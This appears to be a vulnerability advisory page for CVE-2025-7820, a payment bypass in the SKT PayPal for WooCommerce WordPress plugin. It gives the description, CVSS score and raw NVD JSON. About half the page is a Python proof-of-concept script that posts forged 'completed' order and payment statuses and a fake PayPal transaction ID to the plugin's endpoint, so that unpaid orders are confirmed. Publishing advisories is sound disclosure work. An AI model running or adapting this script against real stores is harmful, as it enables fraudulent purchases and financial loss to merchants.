Security Vulnerability Report
CVE-2025-7820 CVSS 7.5 HIGH

CVE-2025-7820

Published: 2025-11-27 05:16:18
Last Modified: 2026-04-15 00:35:42

Description

The SKT PayPal for WooCommerce plugin for WordPress is vulnerable to Payment Bypass in all versions up to, and including, 1.4. This is due to the plugin only enforcing client-side controls instead of server-side controls when processing payments. This makes it possible for unauthenticated attackers to make confirmed purchases without actually paying for them.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

SKT PayPal for WooCommerce <= 1.4 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-7820 PoC - SKT PayPal for WooCommerce Payment Bypass

This PoC demonstrates the payment bypass vulnerability in SKT PayPal for WooCommerce <= 1.4
The vulnerability allows unauthenticated attackers to confirm orders without actual payment.
"""
import requests

TARGET_URL = "https://example-woocommerce-site.com"
TARGET_ENDPOINT = f"{TARGET_URL}/?wc-api=wc_skt_paypal"


def create_malicious_order():
    """
    Step 1: Create a normal order through the WooCommerce checkout process
    This simulates a legitimate purchase attempt.
    """
    checkout_data = {
        "billing_first_name": "Test",
        "billing_last_name": "User",
        "billing_email": "[email protected]",
        "billing_phone": "1234567890",
        "payment_method": "skt_paypal",
        "products": ["product_id_123"],
    }
    # In real scenario, this would be done through the website
    print("[*] Step 1: Order created (payment pending)")
    return {"order_id": "ORDER_12345", "amount": "99.99"}


def bypass_payment(order_id):
    """
    Step 2: Bypass payment verification by directly setting order status to 'completed'
    The vulnerable plugin trusts client-side order status without server-side PayPal verification.
    """
    print(f"[*] Step 2: Attempting payment bypass for order {order_id}")
    # Malicious request to mark order as completed without payment
    bypass_payload = {
        "order_id": order_id,
        "order_status": "completed",  # Attacker-controlled status
        "payment_status": "completed",
        "skt_paypal_txn_id": "FAKE_TXN_ID",  # Forged transaction ID
        "skt_paypal_status": "Completed",
    }
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Payment Bypass PoC)",
    }
    try:
        # This endpoint is vulnerable - it doesn't verify PayPal transaction server-side
        response = requests.post(
            TARGET_ENDPOINT,
            data=bypass_payload,
            headers=headers,
            verify=False,
            timeout=10,
        )
        if response.status_code == 200:
            print("[+] Payment bypass successful! Order marked as paid.")
            print("[+] Attacker now has access to paid content without payment.")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return False


def verify_order_access(order_id):
    """
    Step 3: Verify that the attacker can now access paid content
    """
    print(f"[*] Step 3: Verifying access to order {order_id}")
    # Attacker can now download products, access subscriptions, etc.
    access_url = f"{TARGET_URL}/my-account/view-order/{order_id}/"
    print(f"[+] Attacker can now access: {access_url}")
    print("[+] Impact: Financial loss to merchant, unauthorized access to paid content")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-7820 PoC - SKT PayPal for WooCommerce Payment Bypass")
    print("=" * 60)

    # Execute attack chain
    order_info = create_malicious_order()
    success = bypass_payment(order_info["order_id"])
    if success:
        verify_order_access(order_info["order_id"])

    print("\n[*] PoC execution completed")
    print("[*] Mitigation: Upgrade to SKT PayPal for WooCommerce > 1.4")

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-7820",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-27T05:16:17.913",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The SKT PayPal for WooCommerce plugin for WordPress is vulnerable to Payment Bypass in all versions up to, and including, 1.4. This is due to the plugin only enforcing client side controls instead of server-side controls when processing payments. This makes it possible for unauthenticated attackers to make confirmed purchases without actually paying for them."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-602"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3403118%40skt-paypal-for-woocommerce&new=3403118%40skt-paypal-for-woocommerce&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1a67b1b3-eb39-4e9a-ba44-ea637fc3bba1?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}